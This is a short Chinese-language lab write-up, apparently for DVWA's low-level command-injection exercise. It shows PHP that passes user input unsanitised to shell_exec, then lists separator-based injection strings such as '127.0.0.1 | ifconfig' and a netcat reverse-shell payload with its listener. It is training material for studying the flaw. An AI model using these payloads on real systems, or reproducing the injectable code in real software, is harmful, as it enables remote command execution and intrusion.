Low
源码
<?php
  if( isset( $_POST[ 'Submit' ]  ) ) {          $target = $_REQUEST[ 'ip' ];
                     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {                  $cmd = shell_exec( 'ping  ' . $target );     }     else {                  $cmd = shell_exec( 'ping  -c 4 ' . $target );     }
                echo "<pre>{$cmd}</pre>"; }
  ?>
   | 
 
解题
尝试使用反弹命令,使得CMD将权限反弹出来。但是这不是pikachu靶场,无法实现ncat反弹shell的命令(docker环境的不完整性),能执行的仅仅是实现简单的恶意语句执行。
注意: 1.这个环境实现的是Ping操作,所以说输入IP地址相当于使用了 'ping IP地址'的操作 2.使用Ifconfig还是Ipconfig取决于当前系统环境
  连接字符 | || & &&
  无论是否为true/false,优先执行后面的语句 127.0.0.1 | ifconfig
  无论是否为true/false,ping ip的操作和ifconfig的操作都将被执行一遍. 127.0.0.1 & ifconfig
  当ping IP执行为false时,执行后面的ifconfig 127.0.0.1 || ifconfig 127.0.0.1 && ifconfig
   | 
 

 
  127.0.0.1|nc -e /bin/bash 192.168.10.100 5566
  nc -lvvp 5566 下面是最明显的回显
 
  | 
 
